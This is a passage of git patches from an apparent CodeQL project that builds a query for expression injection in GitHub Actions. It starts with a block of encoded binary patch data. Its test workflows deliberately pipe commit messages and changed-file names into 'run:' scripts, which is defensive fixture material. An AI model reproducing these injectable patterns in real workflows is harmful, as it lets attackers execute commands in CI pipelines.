zyUM2rb*sJ2f0fL5u3(%Q5_PjAHz+qmGr^lY{2oe?39in9*jVIC0!V8~wQDN^2>ynM zy$2&}R^(CRbS56Lr1de1U%sYC<`E08@P{s~x>3f*T;I|9x)Y47^e!PQGxe_1vm|wi zb4$N_v@O(XE<5{WmIzv1+7Z&i7kB42ZWOGYb3x-%dU93CdT735FUBS2*P-Ps)=2wm zM)50TTmFfn0hpjaDABSoHti&64$R>kVNKRrW;2?|=KbG|vb~(EajfD;$B8>eN*?qce$ue!L(J+@SJcsb!3LQK2&|CQ38rj9$My9!!WL8M7K2DVLhA zSHeZ$_miDJgeu@rV=2`E4`4*6+IZckS!lPs8`^&Ymb827AY2lsEW;u$m@0PgrzWnR z<`F+XIW?JY;M#PU_2B)Kn_@QqY5)GZJsTL}t8nbGkmiaBxiBD;>qx$D`+~238nQ0h zaQ0EJH=L^bL-{6)K6o0m3*?rv^pObUHz{yS3n9NvtUa3fEWg-iQL2NM!zq;v92kgeCd_Oa$Z2Xx)n=E4=#)}}a*w7AZFMEF=}qop6) za0L9AouzYg%1HQ}>K$v5(#jyc`WRW?<9tpn3C!|jR zNaAL1osGGZI}M1W>$WD{Bo8jhChyDekBPhiC92@lAf5TjO5i=@ikX8=lgk2{Heh%O zR9K?BeN>{LbmxgpX+q+|Qt8-QT5dM*%|>*{gy9R>;=xftjm-tdIc2BV; z-O9&+8>eCsiLz~Pq+%>5%y6BYNyKtJ=8$#+>+qZyg zTx01;?Jbr*$VUX>PK}fB5BQ6yN~#qNRQ~GWXXoxo8r(Iryl97ZIn>ujcv3Y6x_x+Y zQA$O=^tA+Q5<2PDlEbaWOc}#$f=L%cu-d>>&o*7j9X>q76n|K#ty|j8I-=^-r@kJX z0=N@eVXe20T1U`mQ=J@m=}$tJwN9xMqL8a@GhqyeZ!XI zei0gIM00*jBIy)G2jAaso_FZtBjf7nw%O>C%zmG|3wqhn+2$sllbcGRB`@jL^EG;J z`n}cVWRV(VXQ#Oi?_=eaJ-O+Y5s7?I#> "$GITHUB_OUTPUT" + - id: sink + run: | + echo "echo ${{steps.no-step.outputs.foo}}" + + diff --git a/ql/src/test/no-flow2.yml b/ql/src/test/no-flow2.yml new file mode 100644 index 00000000000..429d4650b60 --- /dev/null +++ b/ql/src/test/no-flow2.yml @@ -0,0 +1,37 @@ +name: CI + +on: + pull_request: + branches: + - main + +jobs: + changed_files: + runs-on: ubuntu-latest + name: Test changed-files + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: 'foobarfoo' + find: 'foo' + replace: '' + + - name: List all changed files + id: sink + run: | + for file in ${{ steps.step.outputs.value }}; do + echo "$file was changed" + done + + + diff --git a/ql/src/test/simple1.yml b/ql/src/test/simple1.yml new file mode 100644 index 00000000000..f61e763f188 --- /dev/null +++ b/ql/src/test/simple1.yml @@ -0,0 +1,16 @@ +on: push + +jobs: + simple1: + runs-on: ubuntu-latest + + steps: + - id: source + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ github.event.head_commit.message }} + find: 'foo' + replace: '' + - id: sink + run: | + echo "${{steps.source.outputs.value}}" diff --git a/ql/src/test/simple2.yml b/ql/src/test/simple2.yml new file mode 100644 index 00000000000..f3d79b97bc2 --- /dev/null +++ b/ql/src/test/simple2.yml @@ -0,0 +1,36 @@ +name: CI + +on: + pull_request: + branches: + - main + +jobs: + changed_files: + runs-on: ubuntu-latest + name: Test changed-files + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + - name: List all changed files + id: sink + run: | + for file in ${{ steps.step.outputs.value }}; do + echo "$file was changed" + done + + diff --git a/ql/src/test/test.ql b/ql/src/test/test.ql new file mode 100644 index 00000000000..f8d6e0c804b --- /dev/null +++ b/ql/src/test/test.ql @@ -0,0 +1,37 @@ +/** + * @name Expression injection in Actions + * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious + * user to inject code into the GitHub action. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/command-injection + * @tags actions + * security + * external/cwe/cwe-094 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential injection from the ${{ " + sink.getNode().asExpr().(ExprAccessExpr).getExpression() + + " }}, which may be controlled by an external user." diff --git a/ql/src/test/test.yml b/ql/src/test/test.yml new file mode 100644 index 00000000000..8f9cbf3b644 --- /dev/null +++ b/ql/src/test/test.yml @@ -0,0 +1,35 @@ +on: push + +jobs: + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step2.outputs.test }} + + steps: + - uses: actions/checkout@v4 + - id: step0 + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ github.event.head_commit.message }} + find: 'foo' + replace: '' + - id: step1 + env: + BODY: ${{ steps.step0.outputs.value}} + run: | + Write-Output "::set-output name=MSG::$ENV{BODY}" + - id: step2 + run: echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT" + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: job1 + + steps: + - env: + run: echo ${{needs.job1.outputs.job_output}} From 355ccf42ee38d6855833e3042ebca3de0f596147 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 10:44:37 +0100 Subject: [PATCH 0003/1267] Do not compress local flow steps Use `neverSkipPathGrap` to `any()` so no local flow steps get pruned and thrown away in order to compress the presented dataflow path. --- .../internal/DataFlowImplSpecific.qll | 5 +++- .../dataflow/internal/DataFlowPrivate.qll | 28 +++++-------------- .../Security/CWE-094/ExpressionInjection.ql | 1 + 3 files changed, 12 insertions(+), 22 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll index 4abb455b0dd..2d3b9696ef6 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll @@ -6,6 +6,9 @@ private import codeql.dataflow.DataFlow module ActionsDataFlow implements InputSig { - import DataFlowPrivate + import DataFlowPrivate as Private import DataFlowPublic + import Private + + predicate neverSkipInPathGraph = Private::neverSkipInPathGraph/1; } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index b4abb3e8aa5..8b57ea2436e 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -207,27 +207,6 @@ predicate stepOutputDefToUse(Node nodeFrom, Node nodeTo) { ) } -predicate test1(UsesExpr u, string f, JobStmt j) { - u.getLocation().getFile().getBaseName() = "inter1.yml" and - f = u.getId() and - j = u.getJob() -} - -predicate test2(StepOutputAccessExpr r, string f, JobStmt j) { - r.getLocation().getFile().getBaseName() = "inter1.yml" and - f = r.getStepId() and - j = r.getJob() -} - -predicate test3(UsesExpr u, StepOutputAccessExpr r, Node n) { - r.getLocation().getFile().getBaseName() = "inter1.yml" and - u.getLocation().getFile().getBaseName() = "inter1.yml" and - u.getId() = r.getStepId() and - u.getJob() = r.getJob() and - // el SOAE has no mapping DF NODE - n.asExpr() = r -} - predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { // nodeTo is a JobOutputAccessExpr and nodeFrom is the Job output expression exists(Expression astFrom, JobOutputAccessExpr astTo | @@ -310,3 +289,10 @@ predicate lambdaCall(DataFlowCall call, LambdaCallKind kind, Node receiver) { no /** Extra data-flow steps needed for lambda flow analysis. */ predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preservesValue) { none() } + +/** + * Since our model is so simple, we dont want to compress the local flow steps. + * This compression is normally done to not show SSA steps, casts, etc. + */ +predicate neverSkipInPathGraph(Node node) { any() } + diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index f8d6e0c804b..4af1e2c286a 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -24,6 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } + //predicate neverSkip(DataFlow::Node node) { any() } } module MyFlow = TaintTracking::Global; From 093b1a22110b2573befe6dd8c7662ce863038a34 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 10:45:52 +0100 Subject: [PATCH 0004/1267] Remove test dbs --- ql/lib/test-db/baseline-info.json | 1 - ql/lib/test-db/codeql-database.yml | 10 - ql/lib/test-db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 40 -> 0 bytes .../pools/0/buckets/page-000000 | Bin 8192 -> 0 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 40 -> 0 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 8192 -> 0 bytes .../cached-strings/pools/0/indices1/info | Bin 40 -> 0 bytes .../pools/0/indices1/page-000000 | Bin 8192 -> 0 bytes .../default/cache/cached-strings/pools/0/info | Bin 41 -> 0 bytes .../cached-strings/pools/0/metadata/info | Bin 40 -> 0 bytes .../pools/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../pools/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes .../cache/cached-strings/pools/poolInfo | Bin 28 -> 0 bytes .../cache/cached-strings/tuple-pool/header | Bin 4 -> 0 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 16 -> 0 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 24 -> 0 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 32 -> 0 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 24 -> 0 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 1080 -> 0 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 16 -> 0 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 12 -> 0 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 16 -> 0 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 12 -> 0 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 16 -> 0 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 12 -> 0 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 24 -> 0 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 12 -> 0 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 16 -> 0 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 544 -> 0 bytes .../db-yaml/default/cache/pages/01.pack | Bin 118 -> 0 bytes .../db-yaml/default/cache/pages/02.pack | Bin 79 -> 0 bytes .../db-yaml/default/cache/pages/0d.pack | Bin 92 -> 0 bytes .../db-yaml/default/cache/pages/15.pack | Bin 131 -> 0 bytes .../db-yaml/default/cache/pages/1f.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/1f.pack.d | Bin 85 -> 0 bytes .../db-yaml/default/cache/pages/29.pack | Bin 84 -> 0 bytes .../db-yaml/default/cache/pages/2b.pack | Bin 92 -> 0 bytes .../db-yaml/default/cache/pages/2d.pack | Bin 91 -> 0 bytes .../db-yaml/default/cache/pages/34.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/34.pack.d | Bin 865 -> 0 bytes .../db-yaml/default/cache/pages/37.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/37.pack.d | Bin 163 -> 0 bytes .../db-yaml/default/cache/pages/43.pack | Bin 368 -> 0 bytes .../db-yaml/default/cache/pages/54.pack | Bin 229 -> 0 bytes .../db-yaml/default/cache/pages/55.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/55.pack.d | Bin 140 -> 0 bytes .../db-yaml/default/cache/pages/9c.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/9c.pack.d | Bin 1086 -> 0 bytes .../db-yaml/default/cache/pages/a1.pack | Bin 99 -> 0 bytes .../db-yaml/default/cache/pages/b4.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/b4.pack.d | Bin 156 -> 0 bytes .../db-yaml/default/cache/pages/b7.pack | Bin 282 -> 0 bytes .../db-yaml/default/cache/pages/b9.pack | Bin 89 -> 0 bytes .../db-yaml/default/cache/pages/bc.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/bc.pack.d | Bin 596 -> 0 bytes .../db-yaml/default/cache/pages/c0.pack | Bin 89 -> 0 bytes .../db-yaml/default/cache/pages/c3.pack | Bin 115 -> 0 bytes .../db-yaml/default/cache/pages/e0.pack | Bin 92 -> 0 bytes .../db-yaml/default/cache/pages/f3.pack | Bin 152 -> 0 bytes .../db-yaml/default/cache/pages/fc.pack | Bin 84 -> 0 bytes .../db-yaml/default/cache/predicates/02.pack | Bin 154 -> 0 bytes .../db-yaml/default/cache/predicates/03.pack | Bin 144 -> 0 bytes .../db-yaml/default/cache/predicates/06.pack | Bin 145 -> 0 bytes .../db-yaml/default/cache/predicates/09.pack | Bin 145 -> 0 bytes .../db-yaml/default/cache/predicates/10.pack | Bin 151 -> 0 bytes .../db-yaml/default/cache/predicates/24.pack | Bin 136 -> 0 bytes .../db-yaml/default/cache/predicates/26.pack | Bin 146 -> 0 bytes .../db-yaml/default/cache/predicates/2d.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/predicates/2e.pack | Bin 147 -> 0 bytes .../db-yaml/default/cache/predicates/2f.pack | Bin 152 -> 0 bytes .../db-yaml/default/cache/predicates/3b.pack | Bin 151 -> 0 bytes .../db-yaml/default/cache/predicates/3c.pack | Bin 170 -> 0 bytes .../db-yaml/default/cache/predicates/53.pack | Bin 141 -> 0 bytes .../db-yaml/default/cache/predicates/5a.pack | Bin 140 -> 0 bytes .../db-yaml/default/cache/predicates/60.pack | Bin 161 -> 0 bytes .../db-yaml/default/cache/predicates/6f.pack | Bin 169 -> 0 bytes .../db-yaml/default/cache/predicates/75.pack | Bin 147 -> 0 bytes .../db-yaml/default/cache/predicates/7c.pack | Bin 161 -> 0 bytes .../db-yaml/default/cache/predicates/86.pack | Bin 146 -> 0 bytes .../db-yaml/default/cache/predicates/99.pack | Bin 141 -> 0 bytes .../db-yaml/default/cache/predicates/a1.pack | Bin 146 -> 0 bytes .../db-yaml/default/cache/predicates/a2.pack | Bin 144 -> 0 bytes .../db-yaml/default/cache/predicates/a8.pack | Bin 145 -> 0 bytes .../db-yaml/default/cache/predicates/bf.pack | Bin 169 -> 0 bytes .../db-yaml/default/cache/predicates/c5.pack | Bin 157 -> 0 bytes .../db-yaml/default/cache/predicates/d2.pack | Bin 148 -> 0 bytes .../db-yaml/default/cache/predicates/d4.pack | Bin 170 -> 0 bytes .../db-yaml/default/cache/predicates/e3.pack | Bin 169 -> 0 bytes .../db-yaml/default/cache/predicates/e4.pack | Bin 147 -> 0 bytes .../db-yaml/default/cache/predicates/f9.pack | Bin 154 -> 0 bytes .../db-yaml/default/cache/relations/06.pack | Bin 289 -> 0 bytes .../db-yaml/default/cache/relations/10.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/11.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/19.pack | Bin 289 -> 0 bytes .../db-yaml/default/cache/relations/1e.pack | Bin 160 -> 0 bytes .../db-yaml/default/cache/relations/2a.pack | Bin 177 -> 0 bytes .../db-yaml/default/cache/relations/2f.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/39.pack | Bin 272 -> 0 bytes .../db-yaml/default/cache/relations/4b.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/56.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/5c.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/6a.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/7c.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/9f.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/a0.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/ac.pack | Bin 109 -> 0 bytes .../db-yaml/default/cache/relations/bf.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/ca.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/d3.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/e9.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/f9.pack | Bin 143 -> 0 bytes ql/lib/test-db/db-yaml/default/cache/version | 1 - .../db-yaml/default/containerparent.rel | Bin 80 -> 0 bytes .../default/containerparent.rel.checksum | Bin 12 -> 0 bytes ql/lib/test-db/db-yaml/default/files.rel | Bin 8 -> 0 bytes .../db-yaml/default/files.rel.checksum | Bin 12 -> 0 bytes ql/lib/test-db/db-yaml/default/folders.rel | Bin 80 -> 0 bytes .../db-yaml/default/folders.rel.checksum | Bin 12 -> 0 bytes .../db-yaml/default/locations_default.rel | Bin 1416 -> 0 bytes .../default/locations_default.rel.checksum | Bin 12 -> 0 bytes .../db-yaml/default/pools/0/buckets/info | Bin 40 -> 0 bytes .../default/pools/0/buckets/page-000000 | Bin 8192 -> 0 bytes ql/lib/test-db/db-yaml/default/pools/0/info | Bin 33 -> 0 bytes .../db-yaml/default/pools/0/metadata/info | Bin 40 -> 0 bytes .../default/pools/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../default/pools/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes .../db-yaml/default/pools/1/buckets/info | Bin 40 -> 0 bytes .../default/pools/1/buckets/page-000000 | Bin 8192 -> 0 bytes .../test-db/db-yaml/default/pools/1/ids1/info | Bin 40 -> 0 bytes .../db-yaml/default/pools/1/ids1/page-000000 | Bin 8192 -> 0 bytes .../db-yaml/default/pools/1/indices1/info | Bin 40 -> 0 bytes .../default/pools/1/indices1/page-000000 | Bin 8192 -> 0 bytes ql/lib/test-db/db-yaml/default/pools/1/info | Bin 41 -> 0 bytes .../db-yaml/default/pools/1/metadata/info | Bin 40 -> 0 bytes .../default/pools/1/metadata/page-000000 | Bin 8192 -> 0 bytes .../default/pools/1/pageDump/page-000000000 | Bin 1048592 -> 0 bytes ql/lib/test-db/db-yaml/default/pools/poolInfo | Bin 32 -> 0 bytes .../db-yaml/default/sourceLocationPrefix.rel | Bin 4 -> 0 bytes .../default/sourceLocationPrefix.rel.checksum | Bin 12 -> 0 bytes .../default/strings/0/buckets/page-000000 | Bin 8192 -> 0 bytes .../default/strings/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../default/strings/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes ql/lib/test-db/db-yaml/default/yaml.rel | Bin 1416 -> 0 bytes .../test-db/db-yaml/default/yaml.rel.checksum | Bin 12 -> 0 bytes .../db-yaml/default/yaml_locations.rel | Bin 472 -> 0 bytes .../default/yaml_locations.rel.checksum | Bin 12 -> 0 bytes .../test-db/db-yaml/default/yaml_scalars.rel | Bin 552 -> 0 bytes .../db-yaml/default/yaml_scalars.rel.checksum | Bin 12 -> 0 bytes ql/lib/test-db/db-yaml/yaml.dbscheme | 80 ----- ...-diagnostics-add-20240203T091755.518Z.json | 0 ...-diagnostics-add-20240203T091756.033Z.json | 0 .../database-create-20240203.101754.571.log | 275 ----------------- ...tabase-index-files-20240203.101755.239.log | 15 - ql/lib/test-db/src.zip | Bin 578 -> 0 bytes ql/src/test-db/baseline-info.json | 1 - ql/src/test-db/codeql-database.yml | 10 - ql/src/test-db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 40 -> 0 bytes .../pools/0/buckets/page-000000 | Bin 8192 -> 0 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 40 -> 0 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 8192 -> 0 bytes .../cached-strings/pools/0/indices1/info | Bin 40 -> 0 bytes .../pools/0/indices1/page-000000 | Bin 8192 -> 0 bytes .../default/cache/cached-strings/pools/0/info | Bin 41 -> 0 bytes .../cached-strings/pools/0/metadata/info | Bin 40 -> 0 bytes .../pools/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../pools/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes .../cache/cached-strings/pools/poolInfo | Bin 28 -> 0 bytes .../cache/cached-strings/tuple-pool/header | Bin 4 -> 0 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 16 -> 0 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 80 -> 0 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 116 -> 0 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 80 -> 0 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 4776 -> 0 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 16 -> 0 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 12 -> 0 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 16 -> 0 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 12 -> 0 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 16 -> 0 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 12 -> 0 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 24 -> 0 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 12 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-15fd6561 | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-15fd6561#0# | Bin 12 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-729b2108 | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-729b2108#0# | Bin 12 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-7595a81e | Bin 16 -> 0 bytes ...king#f6f2598d--TaintFlow-7595a81e#0#tttttt | Bin 260 -> 0 bytes ...Tracking#f6f2598d--TaintFlow-7595a81e#1#tt | Bin 68 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-cd159b4d | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-cd159b4d#0# | Bin 12 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-d2947120 | Bin 16 -> 0 bytes ...tTracking#f6f2598d--TaintFlow-d2947120#0#t | Bin 2392 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-d8fdd114 | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-d8fdd114#0# | Bin 12 -> 0 bytes ...taFlow---Cached--TAccessPathFront-12309985 | Bin 16 -> 0 bytes ...low---Cached--TAccessPathFront-12309985#0# | Bin 12 -> 0 bytes ...Flow---Cached--TAccessPathFrontOp-ea156098 | Bin 16 -> 0 bytes ...w---Cached--TAccessPathFrontOp-ea156098#0# | Bin 12 -> 0 bytes ...---Cached--TAccessPathFrontOp-ea156098#1#t | Bin 16 -> 0 bytes ...Flow---Cached--TApproxAccessPathF-0bf03857 | Bin 16 -> 0 bytes ...w---Cached--TApproxAccessPathF-0bf03857#0# | Bin 12 -> 0 bytes ...---Cached--TApproxAccessPathF-0bf03857#1#t | Bin 16 -> 0 bytes ...Flow---Cached--TApproxAccessPathF-baba9c49 | Bin 16 -> 0 bytes ...w---Cached--TApproxAccessPathF-baba9c49#0# | Bin 12 -> 0 bytes ...DataFlow---Cached--TBooleanOption-dec0af22 | Bin 16 -> 0 bytes ...aFlow---Cached--TBooleanOption-dec0af22#0# | Bin 12 -> 0 bytes ...Flow---Cached--TBooleanOption-dec0af22#1#b | Bin 24 -> 0 bytes ...nsDataFlow---Cached--TCallContext-54d858e5 | Bin 16 -> 0 bytes ...ataFlow---Cached--TCallContext-54d858e5#0# | Bin 12 -> 0 bytes ...ataFlow---Cached--TCallContext-54d858e5#2# | Bin 12 -> 0 bytes ...Flow---Cached--TDataFlowCallOptio-c18bdb95 | Bin 16 -> 0 bytes ...w---Cached--TDataFlowCallOptio-c18bdb95#0# | Bin 12 -> 0 bytes ...---Cached--TDataFlowCallOptio-c18bdb95#1#t | Bin 128 -> 0 bytes ...Flow---Cached--TLocalFlowCallCont-17f4a8f6 | Bin 16 -> 0 bytes ...w---Cached--TLocalFlowCallCont-17f4a8f6#0# | Bin 12 -> 0 bytes ...taFlow---Cached--TParamNodeOption-178d6b8b | Bin 16 -> 0 bytes ...low---Cached--TParamNodeOption-178d6b8b#0# | Bin 12 -> 0 bytes ...ionsDataFlow---Cached--TReturnCtx-f40235df | Bin 16 -> 0 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#0# | Bin 12 -> 0 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#1# | Bin 12 -> 0 bytes ...DataFlow---Cached--TReturnKindExt-9770a119 | Bin 16 -> 0 bytes ...Flow---Cached--TReturnKindExt-9770a119#0#t | Bin 16 -> 0 bytes ...es#DataFlowPrivate#6a54d7ad--TDataFlowType | Bin 16 -> 0 bytes ...DataFlowPrivate#6a54d7ad--TDataFlowType#0# | Bin 12 -> 0 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 16 -> 0 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 2392 -> 0 bytes ...ples#DataFlowPrivate#6a54d7ad--TReturnKind | Bin 16 -> 0 bytes ...s#DataFlowPrivate#6a54d7ad--TReturnKind#0# | Bin 12 -> 0 bytes ...#6a54d7ad--DataFlowType---TOption-4fb642c9 | Bin 16 -> 0 bytes ...54d7ad--DataFlowType---TOption-4fb642c9#0# | Bin 12 -> 0 bytes ...ion-Unit#54592529--Unit---TOption-51176e26 | Bin 16 -> 0 bytes ...-Unit#54592529--Unit---TOption-51176e26#0# | Bin 12 -> 0 bytes .../tuple-pool/tuples#Unit#54592529--TUnit | Bin 16 -> 0 bytes .../tuple-pool/tuples#Unit#54592529--TUnit#0# | Bin 12 -> 0 bytes .../tuples#printAst#38acf19d--TPrintNode | Bin 16 -> 0 bytes .../tuples#printAst#38acf19d--TPrintNode#0#e | Bin 2672 -> 0 bytes .../db-yaml/default/cache/pages/02.pack | Bin 79 -> 0 bytes .../db-yaml/default/cache/pages/04.pack | Bin 89 -> 0 bytes .../db-yaml/default/cache/pages/1f.pack | Bin 125 -> 0 bytes .../db-yaml/default/cache/pages/29.pack | Bin 84 -> 0 bytes .../db-yaml/default/cache/pages/2b.pack | Bin 162 -> 0 bytes .../db-yaml/default/cache/pages/2d.pack | Bin 91 -> 0 bytes .../db-yaml/default/cache/pages/2e.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/2e.pack.d | Bin 316 -> 0 bytes .../db-yaml/default/cache/pages/32.pack | Bin 112 -> 0 bytes .../db-yaml/default/cache/pages/46.pack | Bin 99 -> 0 bytes .../db-yaml/default/cache/pages/4b.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/4b.pack.d | Bin 3805 -> 0 bytes .../db-yaml/default/cache/pages/67.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/67.pack.d | Bin 664 -> 0 bytes .../db-yaml/default/cache/pages/71.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/71.pack.d | Bin 618 -> 0 bytes .../db-yaml/default/cache/pages/82.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/82.pack.d | Bin 354 -> 0 bytes .../db-yaml/default/cache/pages/91.pack | Bin 112 -> 0 bytes .../db-yaml/default/cache/pages/92.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/92.pack.d | Bin 2612 -> 0 bytes .../db-yaml/default/cache/pages/95.pack | Bin 124 -> 0 bytes .../db-yaml/default/cache/pages/99.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/99.pack.d | Bin 1311 -> 0 bytes .../db-yaml/default/cache/pages/a3.pack | Bin 149 -> 0 bytes .../db-yaml/default/cache/pages/a3.pack.d | Bin 797 -> 0 bytes .../db-yaml/default/cache/pages/a4.pack | Bin 106 -> 0 bytes .../db-yaml/default/cache/pages/ab.pack | Bin 119 -> 0 bytes .../db-yaml/default/cache/pages/b6.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/b6.pack.d | Bin 324 -> 0 bytes .../db-yaml/default/cache/pages/bd.pack | Bin 89 -> 0 bytes .../db-yaml/default/cache/pages/ce.pack | Bin 173 -> 0 bytes .../db-yaml/default/cache/pages/d0.pack | Bin 85 -> 0 bytes .../db-yaml/default/cache/pages/de.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/de.pack.d | Bin 688 -> 